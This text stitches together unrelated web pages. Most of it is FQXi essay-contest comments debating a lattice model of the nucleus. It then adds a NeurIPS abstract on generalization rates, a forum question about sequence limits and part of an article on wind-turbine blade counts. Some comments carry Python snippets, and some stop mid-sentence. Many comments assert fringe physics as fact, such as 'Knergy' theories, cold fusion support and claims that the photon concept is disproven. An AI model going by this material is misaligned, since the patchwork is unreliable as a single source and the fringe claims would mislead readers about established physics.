For AdS_2/CFT_1, the CFT is SL(2, R) or under Euclideanization a representation of an SU(2) isospin gauge theory. This is the nucleon force in a nucleus. The inherent supersymmetry in this correspondence may then be the source for the emergence of supersymmetry in some nuclear states.
Cheers LC
N.D. Cook replied on Jun. 29, 2012 @ 23:34 GMT
Hi Lawrence,
Thanks for the comments. The topic of the “phase” of nuclear matter is complex (the gas-to-liquid transition has been studied mainly in the framework of high-energy multifragmentation; see “Statistical Models for Nuclear Decay”, A.J. Cole, IOP, Bristol, 2000, for discussion). Although the identity of the solid-phase and gaseous-phase IPM descriptions of nuclei has motivated my own research, whichever “phase” is assumed, the surprising finding from the 1990s is that nuclei exist in well-defined IPM states only 75-80% of the time (Pandharipande, Rev. Mod. Phys. 69, 981, 1997), with the remaining percentage being “transition” states. John Wheeler and Niels Bohr both commented that the LARGE nuclei have many characteristics of solids, but, from the perspective of the lattice representation of the IPM, it appears that the 20%-25% of non-IPM states might be due to the fluid movement of nucleons between lattice sites on the nuclear surface... a liquid-like “skin” around a lattice core. The emergence of “supersymmetry” might be more evident in the lattice than in the liquid….
Cheers
Norman
Lawrence B. Crowell replied on Jun. 30, 2012 @ 14:04 GMT
The AdS/CFT analogues appear to hold for some solid-state physics systems with heavy metals. This leads to superconductor behaviors and is thought to be a case of how high-temperature superconductivity occurs. I would tend to agree that if this happens with nuclei, it happens in the lattice phase. If I understand properly, the liquid drop model pertains to highly excited nuclei, which is a case where the nucleus has been excited into a “melt.” At much higher energy I presume one could say the nucleus is vaporized into a scattering of protons and neutrons. There was some work at the Tevatron along those lines. There is also some heavy-ion work: experiments at RHIC and now the heavy-ion runs at the LHC are searching for black-hole/AdS-like behavior in quark-gluon plasmas. This would then represent a more extreme case; a case where the nucleus is replaced with a QCD lattice of quark-gluon physics.
Cheers LC
Lawrence B. Crowell replied on Jul. 10, 2012 @ 17:59 GMT
I guess your references are not on the arXiv. I will try to look them up in library copies. I have been a bit slow, for one of my brothers died recently and I have been involved with that.
Cheers LC
Alan Kadin wrote on Jul. 2, 2012 @ 12:50 GMT
Dr. Cook:
Your excellent essay presents a clear example of the fallacy of non-unique explanations, where a conventional picture is assumed to explain a set of results, even though an alternative picture may reproduce the same results with greater logical consistency. Unfortunately, this fallacy is quite prevalent through science, and indeed all human endeavors. You might also be interested in my own essay (The Rise and Fall of Wave-Particle Duality), where I point out that neutron diffraction from a crystal does NOT uniquely prove that the neutron is a de Broglie wave. The same diffraction results follow for a small-particle neutron scattering from a lattice with quantized momentum transfer.
Alan Kadin, Princeton Junction, NJ, USA
N.D. Cook replied on Jul. 3, 2012 @ 04:41 GMT
Hi Alan,
Thanks for the comments. I will respond to your essay elsewhere, but want to follow up on our common concerns here.
In connecting the dots to form a picture (whether ink dots on paper or data points in our minds), everyone is guided by tacit assumptions about what the final picture should look like. Once the picture has been drawn and made explicit, however, it is hard “not to see” the final product in the mind’s eye – and nearly every new data point will act only to reinforce that view. The “bias for the familiar” is a plague on all scientific endeavor and means that, especially for those of us trying to rethink fundamental physics, we need to offer more than “alternative” views. Alternatives are necessarily less familiar… and consequently suspect! Fair or unfair, we need to do two more things: (1) show how our alternatives are indeed improvements, and (2) show how the historical context led earlier researchers to their (we believe, mistaken) views. The first is simply the development of the new idea itself (and is fun and creative work), but the second is the more arduous task of understanding the ideas of others.
Cheers
Norman
Vladimir F. Tamari wrote on Jul. 3, 2012 @ 09:29 GMT
Congratulations Norman - your many years of hard and original work on the problem of nuclear structure are gradually bearing fruit as more and more people read and respond to your approach. I am particularly grateful to you for stressing the FCC (face-centered-cubic) lattice as the one Nature prefers. As you know I have adopted it in my own theory (of everything - or nothing - i.e. in the vacuum ;). There is something exquisitely beautiful about the diamond-like arrangements of nucleons - shown in the illustrations of your essay. Dirac would have admired your work - he was moved by beauty in physics as this 1970's interview shows.
Norman D. Cook replied on Jul. 7, 2012 @ 03:57 GMT
I think we share a sense of what is beautiful, but I am repeatedly reminded of the truth that beauty is in the eye of the beholder. So, you and I see beauty in lattice symmetries, while others see greater beauty in the act of experimental verification. The Higgs boson is a good example, but I would say that the collective effort that led to that result is more beautiful than the result itself. In any case, the FQXi essays are good examples of different levels of conceptualization, where we stake out our individual claims of “local” beauty. (Meanwhile, we await your essay…)
Vladimir F. Tamari replied on Jul. 7, 2012 @ 13:36 GMT
Hi Norman, indeed we are blessed to have this openness to beauty in general, and to enjoy Japanese gardens and their sense of design and harmony. But the sort of beauty in physics goes beyond just the lovely illustrations - it is in the knowledge of the logic, economy and sheer intelligence in the workings of nature. Of course some may object and say that we impose this sense of order on nature with our theories and ideas, but I think we as natural organisms have evolved in much the same way as atoms and molecules did - and share the same logic!
I just submitted my colorful FQXI essay today; it was harder to pare it down to the required length than to write it!
Cheers!
Vijay Mohan Gupta wrote on Jul. 4, 2012 @ 23:15 GMT
It is a very interesting essay. I reproduce the text from the abstract that interests me:
"The core problem has been the assumption of a central nuclear potential-well to bind nucleons together, in analogy with the Coulomb force that binds electrons to the nucleus."
I believe the problem is still more fundamental and originates from the concept of conservation as applied to energy (with neutralization), while no negative-mass or negative-energy particles have been found to date. If neutralization is extracted out of conservation, Konservation is left behind. (See the upcoming essay on the 5-Dimensional Universe.) With this, the potential well ceases to have meaning for confinement.
Elsewhere, I have commented with a particle model from PicoPhysics describing the particle as a collective set of photons. It is bound together by the difference in relaxation time characteristic of the particle and of the affected space surrounding it.
The PicoPhysics view of stability has the following predominant effects:
1. The space surrounding the particle has an effect on particle stability. This results in different cross-sections for interaction with other particles.
2. It results in specific energy levels of emitted radiation.
3. Nuclear Magic numbers
However, the nuclear dimension of PicoPhysics will be presented at level -4. Only level-1 is publicly available www.picophysics.org
Norman D. Cook replied on Jul. 7, 2012 @ 03:57 GMT
Hi Vijay,
Thanks for the comments. The “central” nuclear potential well has been a source of problems in nuclear structure theory for many decades, so it will be of interest to see if your picophysics can account for experimental facts without that fiction. The magic numbers are important, but their empirical identification is a particularly slippery issue because the “magicness” of proton magic numbers is influenced by the number of neutrons, and vice versa. That is why the textbooks sometimes include 6, 14, 28, 40 and 70 as magic or “semi-magic,” and modern studies on exotic nuclei with huge excesses of protons or neutrons sometimes report the “disappearance” of other magic numbers. The QM “texture” of nuclei is certain (e.g., my Table 2), but the evaluation of “closed” shells is trickier than the evaluation of the inertness of the inert gases in atomic theory.
Edwin Eugene Klingman wrote on Jul. 6, 2012 @ 02:24 GMT
Dear Norman Cook,
I think you have another winning essay. You clearly state the issue: "The core problem has been the assumption of a central nuclear potential well to bind nucleons together..."
Since Quantum Chromodynamics is unable to calculate spin and other form factors for the nucleons, and predicted a 'quark gas' instead of the 'perfect fluid' found when heavy ions collide, it is probably not too surprising that the 'nucleon gas' perspective also fails.
What is surprising is that the gaseous independent particle model (IPM) mimics the symmetries of the lattice such that "to know the quantum mechanical structure of the nucleus... is to know its lattice structure and vice versa." I was somewhat confused about the meaning of the angular momentum quantum number until I found that it's based on the distance from the nuclear spin axis (as I had guessed it must be).
You may recall from my earlier essay and "Chromodynamics War" that my model of nucleons is based on a self-sustained flux tube that provides a pseudo-lattice structure based on nearest-neighbor interactions (at least through the alpha particle and potentially higher). My current essay The Nature of the Wave Function is based on the same field but is focused on the quantum mechanical wave function of free particles and atomic electrons. I have not applied it to the nucleus. As you mention the "many debates concerning the interpretation of quantum mechanics", I hope that you find the opportunity to read my essay, and I very much look forward to your comments.
I also found it helpful to read your 2010 monograph and suggest other interested readers do so. Finally, this essay and monograph and your previous essay have inspired me to buy your book on "Models of the Atomic Nucleus". In short, you have convinced me.
Congratulations again on an excellent essay which seems to unarguably challenge a key assumption of the last century.
Edwin Eugene Klingman
Norman D. Cook wrote on Jul. 7, 2012 @ 03:56 GMT
Hi Edwin,
I too am a fan of your work (and will comment under your essay later) – and especially your book, The Chromodynamics War. The only reason it didn’t make the New York Times best-seller list is that it is relentlessly high-brow, but I think you have identified – and spun an interesting story about – a hugely important conceptual divide between those who value causal coherency versus those who seem to value Standard Model categorization (even when causal coherency is uncertain). In the context of nuclear structure theory, the various nuclear models can account separately for different data sets, but the necessity of jumping from one model to another is jarring for anyone who values coherency… and makes me think there are different understandings of what “understanding” means.
M. Asghar wrote on Jul. 11, 2012 @ 07:37 GMT
Dr. Cook,
I have gone through your thought-provoking paper dealing with "the core problem has been the assumption of a central nuclear potential-well to bind nucleons together, in analogy with the Coulomb force that binds electrons to the nucleus.”
It is true that the central attractive nuclear Coulomb force compels the atomic electrons to orbit around the nucleus, but this is not...
Norman D. Cook replied on Jul. 11, 2012 @ 10:47 GMT
Professor Asghar,
Many thanks for commenting in such detail (here and elsewhere). Despite obvious differences in perspective, I am not sure how mutually-exclusive our views are. Specifically, I would agree with you that the shell model’s description of “independent” nucleon states is “unassailable”. But the theoretical contortions that are needed to get to that description in a...
Edwin Eugene Klingman replied on Jul. 11, 2012 @ 21:33 GMT
Dear Professors Cook and Ashgar,
I hesitate to enter a discussion between two such highly qualified nuclear physicists, but as you note,there are unresolved quantum issues involved.
It is my opinion that the exclusion principle is neither a principle nor a 'force', but a consequence of the physical wave function discussed in my essay, to the effect that the physical wave function of fermions will interfere in such a manner as to preclude their occupying the identically same state.
This model of the nucleon wave function predicts (at the same particle velocity) a physical wave six orders of magnitude weaker than that of the electron, based strictly on mass density. This should be significant from the perspective of de Broglie 'steering' of the particles. Additionally, the associated nuclear model tends to support a lattice structure, or at the very least lattice-based alpha particles.
The model is very new and has no establishment support at the current stage of development, yet at the informal level of FQXi blog comments I feel safe in saying the model supports Dr. Cook's lattice model.
Edwin Eugene Klingman
N.D. Cook replied on Aug. 17, 2012 @ 11:19 GMT
The various models of the nucleus have a long history, going back to the 1930s, and I often refer to the Fermi-gas model, the shell model and the independent-particle model (IPM) collectively as the “gaseous-phase” models. As you note, in fact, their theoretical foundations are quite different. The Fermi-gas model was little more...
Ed Unverricht wrote on Jul. 11, 2012 @ 19:03 GMT
In discussing the complexity of the nuclear version of the Schrodinger wave equation, you say "The first is that the nucleus contains two types of nucleon, protons and neutrons, that are distinguished in terms of the so-called isospin quantum number i. The second is the notion of the coupling of orbital angular momentum (l) with intrinsic angular momentum (s) - giving each nucleon a total angular momentum quantum value (j=l+s)."
Using these ideas and "a strong and short-range nuclear force that acted only among nearest-neighbor nucleons" you show an FCC structure describes a "shell model descriptions of nuclear spins, magnetic moments, shells, subshells and parity states.."
Unfortunately, you also point out "The nuclear lattice does not of course address issues of nucleon substructure or the interpretation of quantum theory itself, and many aspects of quantum 'weirdness' remain enigmas in the lattice."
I liked your essay and learned a lot, especially the clarity the two tables bring to the subject.
There are other models that match the results of these two tables. Consider big thin shells layered on top of each other. Intrinsic angular momentum (s), is modelled as the spin of that shell and orbital angular momentum (l) is modelled as the spin around the axis of the particles precession, which is independent of the intrinsic spin. Animations showing the Larmor frequency of this style of particle can be seen here. Hope you may be so inclined to comment on this.
Thank you for the contribution, a great read.
Norman Cook replied on Oct. 5, 2012 @ 22:25 GMT
Just one comment on your comment!
I remain "agnostic" on most subnucleon issues (quarks, partons and the essence of space-time). Maybe I am just wishy-washy Charlie Brown for that, but I suspect that there are (molecular, atomic and) nuclear structure problems that can and SHOULD BE addressed without postulating explanatory mechanisms from other levels. If they really explain things, that's fine. But if the "explanations" simply shift the puzzle to a different level, they don't solve anything. Conversely, if they are truly explanatory principles - like the Larmor frequency you point out - then the implications should be developed at various levels. Cheers.
M. Asghar wrote on Jul. 12, 2012 @ 12:05 GMT
Dr. Cook.
Thank you for the reaction to my comment on your article. This allows me once more to clarify a few points:
1. The SM potential is not central as in QED; it is the self-generated single-particle potential due to all the nucleons of the nucleus, in which they are supposed to move freely. If it is shown beyond reasonable doubt that the PEP and the hard core cannot ensure this unhindered movement, one has to find another reason to understand the validity of this fundamental Model. For more than 60 years, this SM has been the unassailable source – nay, the raison d’être, with immense predictive power – for the vast enterprise of low-energy nuclear physics. Its vast and unique heritage cannot be wished away or discarded as trash (even by future history) simply by condemning it as artificial in its conception; a lack of understanding of something does not make it artificial.
2. The Fcc Lattice Model is an elegant enterprise, but its range of validity remains to be shown on the ground in its own right. Of course, you will not get 10000 PhD students and unlimited computing power to prove the capacity of this Model. However, as I tried to suggest before, one has to find something that the Lattice Model can treat but the SM cannot deal with. This seems to be the case for the chemically induced cold fusion of D+D and the fission of Pd. Of course, there may be some other things too. The uniqueness of these phenomena will be a powerful backing and justification for this Model in its own right.
3. Please avoid these caravans of citations that have a tendency to end up as the truth on the point treated; this does not do any good to anybody. Moreover, these comments have to be made without hankering after any applause or panegyrics. Finally, I am grateful for the opportunity for these objective comments (and elsewhere) and wish all the best for the Fcc Lattice Model and its practitioners.
Lawrence B. Crowell replied on Jul. 12, 2012 @ 16:00 GMT
The Pauli exclusion principle is a quantum topology. The PEP states that ψψ = 0, which we may then see as a form of d^2 = 0, the dual of ∂∂ = 0 (the boundary of a boundary = 0) in topology. This becomes generalized in supersymmetric form with generators Q. The state ψ is such that Qψ = 0, but with ψ ≠ Qχ. Therefore the state satisfies ψ ∈ ker Q/im Q = H^1(Q), which is a cohomology ring.
The PEP permits one to write a large Slater determinant for the wave function composed of the wave function of each nucleon. The potential between each nucleon would be the Yukawa potential
V(r) = Ae^{-λr}/r
The space would then, in an equilibrium situation, assume an "egg carton" potential function, with a pocket at each nucleon. It would then seem possible to write a numerical program to simulate a nucleus and to determine which of these models is most accurate.
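A minimal sketch, in Python, of the kind of numerical experiment suggested here: it sums a toy Yukawa pair potential over a small cubic arrangement of nucleons. The coupling A, the range parameter lam, and the 2 fm spacing are arbitrary placeholders of my own, not fitted nuclear constants.

```python
import itertools
import math

# Toy Yukawa pair potential V(r) = A * exp(-lam * r) / r.
# A, lam and the lattice spacing are illustrative placeholders only.
A, lam = 1.0, 0.7
spacing = 2.0  # fm

def yukawa(r):
    return A * math.exp(-lam * r) / r

# Eight nucleons on the corners of a small cube.
sites = [(i * spacing, j * spacing, k * spacing)
         for i, j, k in itertools.product(range(2), repeat=3)]

# Total pairwise potential energy of this configuration.
total = sum(yukawa(math.dist(p, q))
            for p, q in itertools.combinations(sites, 2))
print(f"total pair energy for {len(sites)} nucleons: {total:.4f} (arbitrary units)")
```

Comparing such sums for lattice-like and gas-like arrangements of the same nucleons is the sort of test the comment envisions.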
LC
Edwin Eugene Klingman wrote on Jul. 21, 2012 @ 23:06 GMT
Dear Norman Cook,
I'm sure you have enough difficulty swimming against the IPM stream without tying your theory to mine, but I have realized another way in which my theory supports lattice theory. Recall my self-induced flux tube model of the neutron. This model qualitatively explains the eternal(?) life of the proton versus the 800 second life of the neutron, unless the neutron is closely coupled to a nearest neighbor such as in deuterium or an alpha particle. Your lattice would seem to support such nearest-neighbor coupling, with consequent extension of neutron stability for billions of years. A 'gas' model of neutrons (in which "the nucleus itself must be considered to be a tiny gas of "point-like" protons and neutrons that freely orbit within the nuclear interior.") in orbit about a central potential well would not extend neutron life at all.
One more reason for me to believe in your model (and in my own.)
Edwin Eugene Klingman
Yuri Danoyan wrote on Sep. 4, 2012 @ 03:23 GMT
Dear Norman Cook,
In my opinion, Quantum Nucleodynamics exists only in a 2D world.
See my essay with my own Appendix comments
http://fqxi.org/community/forum/topic/1413
Yuri Danoyan replied on Sep. 19, 2012 @ 01:52 GMT
http://resources.metapress.com/pdf-preview.axd?code=dr625064p1460082&size=largest
Hoang cao Hai wrote on Sep. 19, 2012 @ 13:55 GMT
Dear
Very interesting to see your essay.
Perhaps each of us is convinced that his own choice is right! That, of course, is reasonable.
So maybe we should work together to clearly define the theoretical foundations, as the most intellectually challenging task for all of us.
Why do we not try to start with a real challenge that is very close and is the focus of interest of human science: the matter of mass and the Higgs boson of the standard model.
Your knowledge and reasoned belief will let you express an opinion on this matter:
Do you think that mass is the expression of the impact force on material - so with no impact force we do not feel the Higgs boson - similar to the case of weightlessness outside the Earth's atmosphere?
Does there need to be a particle with mass for everything to have volume? If so, then why does the weight of everything change when moving from the Earth to the Moon? Is the Higgs boson lighter there because the Moon's gravity is weaker than the Earth's?
The LHC particle accelerator is used to "smash" particles until the Higgs boson is "ejected", but why can we see it only when we "smash", and not when the machine is off?
Can Higgs particles be "locked up"? And when "released", if we do not act on them with any force, how do we know whether they are "out" or not?
You should boldly give a definition of mass that you think is right for us to consider, or oppose my opinion.
Because in the process of research, "failure" and "success" have similar value for science. Must a correct theory be one without any wrong point?
I would be glad to see comments from you soon, because there are still too many of the same problems.
Regards!
Hải.Caohoàng of THE INCORRECT ASSUMPTIONS AND A CORRECT THEORY
August 23, 2012 - 11:51 GMT on this essay contest.
Peter Jackson wrote on Sep. 25, 2012 @ 14:39 GMT
Norman
I've just read your essay for the 2nd time, and found the parts I understood very interesting and informative. I've cited the nuclear force derivation of Vladimir, analogised with dipoles orbiting a toroid. The nuclear Tokamak and AGN then come into play, neither 'point like' and both with multiple spin axes. Things like the Hopf fibration and magnetospheres are in the same family, which, critically, are founded on the concept of motion. Could there be any analogy here with your visualisation of lattice nucleodynamics?
I believe your current lowly position shows that possibly the most pertinent part of physics is too often ignored. I could really do with your input on a mechanism I consider in my own essay, which relies on results of charge interaction at a nucleodynamic level. The macro results are astounding, if different to current physics, because they work, but the interaction details I work up to may also, I hope, give you food for thought. Certainly a good score coming your way whatever, and I hope you agree mine is also worth one. I'll value your comments equally.
Many thanks, and best of luck.
Peter
Norman Cook replied on Oct. 5, 2012 @ 22:17 GMT
I have enjoyed your essay too. You have packed a lot into 11 pages and we will have to continue "off line", but my only criticism of your approach is that it covers so much. Your final figure (Fig. 4) seems to be the point from which you can "rebuild" the universe... conceptually similar to Tamari's starting point. I would be curious to see what that implies for the relatively "macroscopic" issues of nuclear structure.
Vladimir F. Tamari wrote on Sep. 29, 2012 @ 09:02 GMT
Hello Norman. This is group message to you and the writers of some 80 contest essays that I have already read, rated and probably commented on.
This year I feel proud that the following old and new online friends have accepted my suggestion that they submit their ideas to this contest. Please feel free to read, comment on and rate these essays (including mine) if you have not already done so, thanks:
Why We Still Don't Have Quantum Nucleodynamics by Norman D. Cook a summary of his Springer book on the subject.
A Challenge to Quantized Absorption by Experiment and Theory by Eric Stanley Reiter Very important experiments based on Planck's loading theory, proving that Einstein's idea that the photon is a particle is wrong.
An Artist's Modest Proposal by Kenneth Snelson The world-famous inventor of Tensegrity applies his ideas of structure to de Broglie's atom.
Notes on Relativity by Edward Hoerdt Questioning how the Michelson-Morley experiment is analyzed in the context of Special Relativity
Vladimir Tamari's essay Fix Physics! Is Physics like a badly-designed building? A humorous illustrated take. Plus: Seven foundational questions suggest a new beginning.
Thank you and good luck.
Juan Ramón González Álvarez wrote on Sep. 29, 2012 @ 17:14 GMT
Dear Norman,
You report the dichotomy between the IPM and LDM models. In a sense this reminds me of the old dichotomy between the wave and matrix formulations of quantum mechanics. Both formulations were eventually shown to be equivalent. Is there some possibility that the IPM and LDM models can be considered equivalent, or at least quasi-equivalent, for some range of nuclear phenomena? For instance, it may be possible to relate the long-range potential of the former model to the short-range potential, acting only among nearest-neighbour nucleons, of the latter; specifically, I have in mind some kind of screening.
And a second question. Can the lattice structure be obtained from the Laplacian of the density, in the same way that we obtain the lattice structure of a solid from the Laplacian of the electronic density?
As August Kekulé wrote: "Let us learn to dream, gentlemen, and then perhaps we shall learn the truth."
Regards
Norman Cook replied on Oct. 5, 2012 @ 22:56 GMT
Hi Juan,
I think the different nuclear models are in fact each "correct" in their own way. There should be ways to translate between them, and the fcc lattice is one such translation mechanism.
I have struggled to find a more appropriate expression for the lattice coordinates. Maybe the Laplacian of the 3D structure would connect more directly with experimental data somehow, but I keep returning to the simplicities of 3D solid geometry. The advantage of solid geometry is that it is easy to understand. The disadvantage is that it appears to be "pre-modern" and a crazy attempt to return to the world of earth-fire-and-water and platonic solids. I don't think that is the case, but in fact few nuclear structure theorists have even commented on the strange (but wonderful) identity between nuclear symmetries and fcc symmetries.
Cheers
Vijay Mohan Gupta wrote on Oct. 2, 2012 @ 12:59 GMT
This is a good presentation and a continuation of the build-up on complex contemporary thought. In PicoPhysics (current state) we have the basics of quantization and an integration of contemporary physics (fundamental laws of nature), including what deals with quantum states as well as the structure of particles (photons, elementary particles, nuclei, atoms, molecules, matter) and astronomical objects like...
Vijay Mohan Gupta wrote on Oct. 2, 2012 @ 21:47 GMT
Dear Norman,
From the PicoPhysics perspective, the Quantum Nucleodynamics issue concerns superposition. The energy content per unit Knergy of a nucleon is proportional to Knergy density. However, when superposition takes place, it is no longer dependent on Knergy density, but on the partial density of the associated Knergy unit. For example, an alpha particle has lower energy than 4 individual nucleons, if each were occupying one fourth of the nuclear real space, due to the superposition-induced reduction of associated energy.
Though nuclear stability is a result of superposition, the factors that affect the degree of superposition need to be worked out by studying the cross-sections for various nuclear reactions. This is a time-consuming process, and needs to be left to the next generation.
Even if quantization or the probabilistic nature is explained, currently we can only answer, in general terms, the relative susceptibility of a defined nucleus to a nuclear reaction.
Thanks & Regards,
Vijay Gupta
Proponent - Unary law 'Space Contains Knergy'
Sergey G Fedosin wrote on Oct. 4, 2012 @ 09:24 GMT
If you do not understand why your rating dropped down: as far as I can tell, ratings in the contest are calculated in the following way. Suppose your rating is $R_1$ and $N_1$ is the number of people who have rated you. Then you have $S_1 = R_1 N_1$ points. After that, someone gives you $dS$ points, so you have $S_2 = S_1 + dS$ points, and $N_2 = N_1 + 1$ is the total number of people who have rated you. At the same time you will have $S_2 = R_2 N_2$ points. From here, if you want $R_2 > R_1$, there must be $S_2 / N_2 > S_1 / N_1$, or $(S_1 + dS) / (N_1 + 1) > S_1 / N_1$, or $dS > S_1 / N_1 = R_1$.
In other words, if you want to increase anyone's rating, you must give him more points $dS$ than the participant's rating $R_1$ was at the moment you rated him. From here it is seen that the contest has special rules for ratings, and from here come the misunderstandings of some participants about what has happened to their ratings. Moreover, since community ratings are hidden, some participants are not sure how to increase the ratings of others and give them the maximum of 10 points. But in that case the scale from 1 to 10 points does not work, and some essays are overestimated while others drop down. In my opinion this is a bad problem with this Contest's rating process. I hope the FQXI community will change the rating process.
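As a quick numerical check of the rule just derived (a sketch; the starting rating R1 = 5.0 and vote count N1 = 10 are made-up illustrative values):

```python
# A new vote dS raises the average rating only if dS exceeds the current rating R1.
R1, N1 = 5.0, 10   # made-up starting rating and number of votes

def new_rating(dS):
    S1 = R1 * N1
    return (S1 + dS) / (N1 + 1)

for dS in (3, 5, 8, 10):
    R2 = new_rating(dS)
    print(f"vote {dS:>2}: rating {R1} -> {R2:.3f} "
          f"({'up' if R2 > R1 else 'down or unchanged'})")
```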
Sergey Fedosin
Sergey G Fedosin wrote on Oct. 5, 2012 @ 16:46 GMT
Dear Norman,
I have some simple models of atomic nuclei in the book The physical theories and infinite nesting of matter. Can you look at it and give me feedback?
Sergey Fedosin
Norman Cook replied on Oct. 5, 2012 @ 21:56 GMT
I like your down-to-earth approach to nuclear structure! Binding energies, magnetic moments and quadrupole moments are essential empirical data that any sensible nuclear model must deal with. The smallest nuclei A
Jarek Duda wrote on Oct. 6, 2012 @ 09:39 GMT
Dear Norman,
The model I consider brings some new simple intuitions to nuclear physics as well - maybe you will find them interesting. It is a search for configurations of interaction fields building particles - a soliton particle model - but not only of single mesons or baryons as in the Skyrme model; the ambitious goal is to find a "complete soliton model": a relatively simple single field whose family of local configurations would correspond to the whole particle menagerie and their dynamics. It can be seen as an expansion, by a single degree of freedom, of Faber's model, which reformulates Maxwell's equations so that they no longer allow arbitrary charge but, as in nature, only multiples of the elemental one (Gauss's law counts topological charge).
Jumping to baryons, their structure in this model enforces some charge-like configuration, but does not require the whole elementary charge - some fraction is enough. So while the total charge has to be quantized, locally it can split into quark-like local constructs; this splitting is energetically costly, which naturally explains why the neutron is heavier than the proton and what holds the deuteron together: the proton shares part of its charge with the neutron. The picture is on page 7 of my essay.
Do you think these intuitions sound reasonable?
With best regards,
Jarek Duda
Norman Cook replied on Oct. 6, 2012 @ 22:29 GMT
Dear Jarek,
I find your essay to be a very plausible, intuitive way to build up quantum phenomena.
My first impression is that we need something like Tamari's model at the ground level, your model to introduce dynamics, and then something like Paolo Palazzi's summation rules (http://www.particlez.org/p3a/index.html) to get the spectrum of particle masses and lifetimes.
In that view, "nuclear structure" is rather macroscopic, but might be built from those coherent microscopic arguments.
Maybe we can reconstruct the massive edifice of theoretical physics after all!
Cheers
Jarek Duda replied on Oct. 7, 2012 @ 05:42 GMT
Dear Norman,
Thank you very much for your supporting comments. I would love to finally start a quantitative treatment, but it is a really tough job: finding the exact Lagrangian combined with performing really difficult numerical simulations. Unfortunately I cannot find collaborators to work on such a nonstandard approach; Prof. Faber shares the belief in the existence of a "complete soliton model",...
Edwin Eugene Klingman wrote on Oct. 7, 2012 @ 00:40 GMT
Dear Norman,
I was happy to kick you up the list and watch you get into the finalists. I don't really understand the mechanism by which you were knocked out after close of voting, but I know you belong there. I very much appreciated your essay and hope you will enter another one next year.
Best regards,
Edwin Eugene Klingman
Edwin Eugene Klingman wrote on Oct. 12, 2012 @ 18:36 GMT
Dear Norman Cook,
In a comment to Rob McEachern you remark that, " I too have a small collection of journal referee comments stating that my nuclear model is "inconsistent with the uncertainty principle" and therefore "not quantum mechanical" and therefore simply wrong - no matter what kind of agreement with experimental data is found."
You may find that your approach to the uncertainty principle receives some support in Physical Review Letters 109, 100404 (7 Sept 2012) in which the authors experimentally observe a violation of Heisenberg's "measurement-disturbance relationship" and demonstrate Heisenberg's original formulation to be wrong. I hope this is of some relevance to you.
Also, the same issue contains another paper, #103401, which addresses yet another approach to the 4% discrepancy in the proton radius determined by muonic-hydrogen experiments. They conclude that they have refuted all reasonable hypotheses aiming to resolve the "proton radius puzzle" with the help of three-body physics. Although I have not yet quantitatively solved this problem, my proton model is qualitatively consistent with reality.
Best wishes,
Edwin Eugene Klingman
https://papers.nips.cc/paper/2020/hash/174f8f613332b27e9e8a5138adb7e920-Abstract.html
#### Authors
Yunbei Xu, Assaf Zeevi
#### Abstract
We study problem-dependent rates, i.e., generalization errors that scale tightly with the variance or the effective loss at the "best hypothesis." Existing uniform convergence and localization frameworks, the most widely used tools to study this problem, often fail to simultaneously provide parameter localization and optimal dependence on the sample size. As a result, existing problem-dependent rates are often rather weak when the hypothesis class is "rich" and the worst-case bound of the loss is large. In this paper we propose a new framework based on a "uniform localized convergence" principle. We provide the first (moment-penalized) estimator that achieves the optimal variance-dependent rate for general "rich" classes; we also establish an improved loss-dependent rate for standard empirical risk minimization.
https://www.physicsforums.com/threads/average-of-an-array.49913/
Average of an array
1. Oct 27, 2004
kishtik
Is the limit of an array the average of its terms?
2. Oct 27, 2004
arildno
This is incomprehensible; what do you mean by the term "limit", is "average" arithmetic average, is "array" meant to denote an array of numbers like a vector or matrix?
3. Oct 27, 2004
HallsofIvy
I would be willing to assume that "array" means just a list of numbers and that "average" is the mean or arithmetic average but I still have no idea what you mean by the "limit" of an array. The limit as what variable goes to what?
4. Oct 27, 2004
kishtik
Sorry!
Suppose (an) = (a1, a2, ..., an) is a function from N+ to R (an "array"); "average" can be either arithmetic or geometric; "limit" is the limit of this function as n -> infinity.
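One way to make the question concrete, under the arithmetic- and geometric-mean readings given above, is to compare the running means of a convergent sequence with its limit. A sketch for a_n = 1 + 1/n, whose limit is 1:

```python
import math

# Running arithmetic and geometric means of a_n = 1 + 1/n, which converges to 1.
def a(n):
    return 1 + 1 / n

for n in (10, 1_000, 100_000):
    terms = [a(k) for k in range(1, n + 1)]
    arith = sum(terms) / n
    geom = math.exp(sum(math.log(t) for t in terms) / n)
    print(f"n = {n:>7}: arithmetic mean = {arith:.6f}, geometric mean = {geom:.6f}")
```

For this sequence both running means approach the limit 1 as n grows, though neither equals it at any finite n.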
https://allenergetics.com/wind-energy/how-many-blades-do-i-need-for-a-wind-turbine
Serhii Korneliuk • 4 Oct, 2019 • 4 minutes of reading
## How many blades do I need for a wind turbine?
It would seem a simple question. Most will answer, "Take 3 blades and don't quibble," and to the question "Why?" will reply that the people who build large three-bladed windmills are not stupid.
And let's take a closer look at this issue.
A windmill works by decelerating the air flow: the larger the area of the wind wheel (and the larger the number of blades), the more the flow is slowed. "Eureka," some will shout, "let's take a lot of blades and stop the wind." This is exactly what is done in the desert regions of the US and Australia, where multi-blade windmills (about 24 blades) are used to lift water.
For wind generators, such windmills are not suitable because they have a low tip-speed ratio of about 1.
The tip-speed ratio $Z$ of a wind generator is the ratio of the circumferential velocity of the blade tip ($\omega R$) to the speed of the incoming air stream ($v$):
$Z = \frac{\omega R}{v}$
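To get a feel for the numbers, a small sketch in Python; the 10 m/s wind speed and 2 m blade radius are illustrative values of my own, not taken from the article:

```python
import math

# Tip-speed ratio Z = omega * R / v for a few rotor speeds.
v = 10.0   # assumed wind speed, m/s
R = 2.0    # assumed blade radius, m

for rpm in (60, 300, 600):
    omega = rpm * 2 * math.pi / 60          # angular speed, rad/s
    Z = omega * R / v
    print(f"{rpm:>4} rpm -> tip speed {omega * R:6.1f} m/s, Z = {Z:.1f}")
```

With these assumptions, roughly 60 rpm corresponds to the multi-blade regime (Z near 1), 300 rpm to a three-blade rotor (Z near 6), and 600 rpm to the fast low-blade-count regime (Z near 12).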
The low-speed effect is due to the fact that, above a certain wind speed, the blades begin to interfere with each other through their turbulence, changing the direction of the air flow, and at certain speeds such a windmill slows itself down. From this we see that many-bladed windmills do not spin up to high speeds, so they are used where high rotation speed is not needed.
In turn, windmills with few blades have a high tip-speed ratio, reaching 12 for single-blade wind turbines.
Of course, the tip-speed ratio depends not only on the number of blades, but also on the blade profile and the quality of its manufacture. For example, a full-profile blade made without flaws has a higher tip-speed ratio than a semi-profile blade or a blade with a rough surface.
So why not use a single-blade windmill for a wind generator? Here another parameter comes in, called gyroscopic torque.
